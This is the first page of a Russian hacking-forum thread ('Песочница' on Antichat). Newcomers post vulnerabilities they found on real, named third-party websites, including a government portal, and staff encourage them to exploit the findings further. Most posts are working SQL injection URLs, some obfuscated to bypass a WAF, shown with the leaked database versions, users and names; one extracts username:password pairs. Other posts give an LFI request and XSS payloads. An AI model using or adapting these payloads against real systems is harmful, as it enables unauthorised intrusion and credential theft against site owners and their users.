Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

Page 1 of 18
  1. Егорыч+++

    Егорыч+++ Admin
    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Эта тема только для публикации уязвимостей найденным вами лично. Любая честно найденная уязвимость прибавляет вам репутации. Тема исключительно для вновь прибывших.

    Перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:
    Google:
    Code:
    site:antichat.ru ваш_сайт_с_уязвимостью.ру
    Не забывайте, что необходимо написать эксплоит с выводом для SQLi, для XSS вывести alert(), для LFI прочитать /etc/passwd и т. п.

     
    #1 Егорыч+++, 10 May 2015
    Last edited by a moderator: 31 May 2015
    CyberTro1n and Mister_Bert0ni like this.
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Два http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
    Кстати , тут WAF и я заюзал технику буфер оверфлов П.С нигде я не нашёл на эту тему статей и очень мало мануалов про обход WAF итд .
     
    #2 BabaDook, 10 May 2015
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Три lfi

    http://greyslon.ru/index.php

    post
    action=register
    &ajax=true
    &data=login%3De%26email%3De%26pass%3De%26repass%3De%26payeer%3De%26captcha%3De
    &page=../info
    Ещё это http://greyslon.ru/htaccess Не знаю уязвимость это или нет чтение этого файла
     
    #3 BabaDook, 10 May 2015
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    bidderland.co.in/siteadmin
    Эта уязвимость эксплуатируется за 5 секунд.
    нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете.
     
    #4 BabaDook, 10 May 2015
    Bezlishke and Mister_Bert0ni like this.
  5. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    А что не раскрутил ?
    Code:
    http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+
    Версия: 5.5.43-37.2
    User: c2deuts_ice@localhost
    -----------------------------
    Зачем делать несколько постов можно в одном все выложить
     
    #5 WallHack, 10 May 2015
    Last edited: 10 May 2015
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Раскручивайте уязвимости. Пытайтесь придумать вектор атаки. Мы вас не для этого отбираем, чтобы вы просто умели что-то искать.
     
    _________________________
    #6 BigBear, 10 May 2015
    Take_IT and yarbabin like this.
  7. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    HTML:
    http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+
    5.5.40-0ubuntu0.12.04.1 - вывод в заголовке

    HTML:
    http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
    5.6.23

    HTML:
    http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+
    4.1.18-nt
     
    #7 frank, 10 May 2015
  8. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    HTML:
    http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
    [email protected]
    idserver_damicodb
    5.5.42-cll
     
    #8 frank, 10 May 2015
  9. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    http://goo.gl/imjzsb
    http://goo.gl/8IKVeV
    http://goo.gl/wYRBLz

    http://emofans.ru/gallery/emowallp/
    POST_DATA:
    foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0x7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version())e)f)x)) -- -


    https://www.choosewellness.com.ph/campus-vote_video-entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE(),0x3c62723e506f727420203a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSION_COMPILE_MACHINE,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e))x)x)
     
    #9 Mister_Bert0ni, 10 May 2015
    Last edited: 11 May 2015
    papaher and BabaDook like this.
  10. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    Демонстрация SQLi от меня
     
    #10 Mister_Bert0ni, 10 May 2015
    Шниперсон and kostea like this.
  11. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    Демонстрация SQLi от меня
     
    #11 Mister_Bert0ni, 10 May 2015
    Шниперсон and Dondo like this.
  12. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    SQLi на сайте bitbank
     
    #12 Mister_Bert0ni, 11 May 2015
    Шниперсон and Dondo like this.
  13. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    Да да 5 сек даже много)))
     
    #13 Mister_Bert0ni, 11 May 2015
  14. rezistor

    rezistor New Member

    Joined:
    11 May 2015
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    #14 rezistor, 11 May 2015
  15. Arboretum

    Arboretum Member

    Joined:
    8 May 2015
    Messages:
    7
    Likes Received:
    8
    Reputations:
    0
    http://java.lordy.ru/
    Есть жаба игра, зарегавшись, в чате можно написать "><script>alert(XSS)</script>", после этого на java.lordy.ru высветится XSS.
     
    #15 Arboretum, 11 May 2015
    qwaszx000 and fazernotinworld like this.
  16. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    HTML:
    http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+
    [email protected]
    jhewlett_prod:5.0.96-log

    HTML:
    http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    5.0.96-log
    [email protected]
    nightgallery20

    HTML:
    http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    10.0.17-MariaDB-cll-lve
    [email protected]4.au.syr

    HTML:
    http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+
    4.0.26-standard-log
    novagoraTest
    [email protected]
     
    #16 frank, 11 May 2015
  17. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    #17 Zen1T21, 11 May 2015
  18. tiger_x

    tiger_x New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    2
    Reputations:
    7
    HTML:
    http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version%28%29,null,null%20--
    Версия: 5.6.23
    User: oarorgro_oar@localhost
     
    #18 tiger_x, 11 May 2015
  19. rezistor

    rezistor New Member

    Joined:
    11 May 2015
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    XSS :)
    http://gov.cap.ru/?__VIEWSTATE=/wEPDwUKLTczMDc3ODY5Nw9kFgJmD2QWAgIDD2QWEgIBD2QWAgIBD2QWAgIBDxYCHgRUZXh0BXLQp9GD0LLQsNGI0YHQutCw0Y8g0YDQtdGB0L/Rg9Cx0LvQuNC60LAgPGRpdj7QntGE0LjRhtC40LDQu9GM0L3Ri9C5INC/0L7RgNGC0LDQuyDQvtGA0LPQsNC90L7QsiDQstC70LDRgdGC0Lg8L2Rpdj5kAgMPZBYOAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwFoZBYCZg8PFgIeC05hdmlnYXRlVXJsBTpodHRwOi8vZ292LmNhcC5ydS9Pcmdhbml6YXRpb24uYXNweD9nb3ZfaWQ9NDkmdW5pdD1jb250YWN0ZGQCBQ8PFgIfAWhkFgJmDw8WAh8CBSpodHRwOi8vZ292LmNhcC5ydS9TdHJ1Y3R1cmUuYXNweD9nb3ZfaWQ9NDlkZAIJDw8WAh8BZ2QWAmYPFgIeBGhyZWYFMmh0dHA6Ly9nb3YuY2FwLnJ1L1NpdGVNYXAuYXNweD9pZD0zNjU0NzcmZ292X2lkPTQ5ZAILDw8WAh8CBShodHRwOi8vZ292LmNhcC5ydS9TaXRlTWFwLmFzcHg/Z292X2lkPTQ5ZGQCDQ8PFgIfAgUtaHR0cDovL2dvdi5jYXAucnUvc3BlYy9EZWZhdWx0LmFzcHg/Z292X2lkPTQ5ZGQCDw8PFgIfAgUmaHR0cDovL2dvdi5jYXAucnUvcnNzLz9nb3ZfaWQ9NDkmaWQ9NDlkZAIHD2QWBgIDDw8WAh8BZ2RkAgUPDxYCHwFnZGQCFQ8PFgIfAWdkZAINDw8WAh8BZ2RkAhEPDxYCHwFoZGQCEw9kFhoCAQ9kFgICAQ8PFgIfAgUcaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPXRvcGRkAgMPZBYCAgEPDxYCHwIFHWluZm8uYXNweD9nb3ZfaWQ9NDkmdHlwZT1tYWluZGQCBQ9kFgICAQ8PFgIfAgUdaW5mby5hc3B4P2dvdl9pZD00OSZ0eXBlPW5ld3NkZAIHDw8WAh8BaGRkAgkPZBYCAgEPDxYCHwIFFHZpZGVvLmFzcHg/Z292X2lkPTQ5ZGQCCw8PFgIfAWhkZAINDw8WAh8BaGQWAgIBDw8WAh8CBRdjYWxlbmRhci5hc3B4P2dvdl9pZD00OWRkAg8PZBYCAgEPDxYCHwIFGlB1YmxpY2F0aW9uLmFzcHg/Z292X2lkPTQ5ZGQCEQ9kFgICAQ8PFgIfAgUYTWVtb3JpYWxzLmFzcHg/Z292X2lkPTQ5ZGQCEw8PFgIfAWhkZAIVD2QWAgIBDw8WAh8CBRNsYXdzLmFzcHg/Z292X2lkPTQ5ZGQCFw8PFgIfAWhkZAIZDw8WAh8BaGRkAhUPDxYCHwFoZGQCFw8PFgIfAWdkZAIbD2QWAgIBDw8WAh8CBSZPcmdzLmFzcHg/Z292X2lkPTQ5JmlkPTQ5JnVuaXQ9Y29udGFjdGRkZP3Mf6N7ALxvhcyia+88BzPuA4FLR9eN77dXGFDCRBD/&ctl00$Search1$BtnSearch=&__VIEWSTATEGENERATOR=CA0B0334&ctl00$Search1$TextSearch=античат<script>alert()</script>&__EVENTVALIDATION=/wEWBwK1y/X1DALNk6LCAwKbnsfFCAK8lLmCCQLC9M+dCwKC1JS2BwKjz9/DAXkyh+c6G8rMsfjzrV2Wjy6zi7nnNfiqJHMfqPO+S6mI&ctl00$Comments=античат&ctl00$ErrorText=
     
    #19 rezistor, 11 May 2015
    Mister_Bert0ni likes this.
  20. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    190
    Reputations:
    57
    http://goo.gl/uMgvlO
    Code:
    http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723e43757272656e745f55736572203a3a202020203a3a  ,@b,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,VERSION(),0xa3c62723e486f73746e616d65203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -
    Может кто знает как здесь WAF на information_schema обойти?
     
    #20 Mister_Bert0ni, 11 May 2015
    Last edited: 12 May 2015
(You must log in or sign up to post here.)
Page 1 of 18
Loading...
Similar Threads - Уязвимости SQLi
  1. zase

    массовый взлом сайтов

    zase, 25 Dec 2022, in forum: Песочница
    Replies:
    1
    Views:
    3,527
    lifescore
    14 Jan 2023
  2. Shadows_God

    Взлом сайтов

    Shadows_God, 20 Nov 2022, in forum: Песочница
    Replies:
    14
    Views:
    7,995
    CyberTro1n
    4 May 2024
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.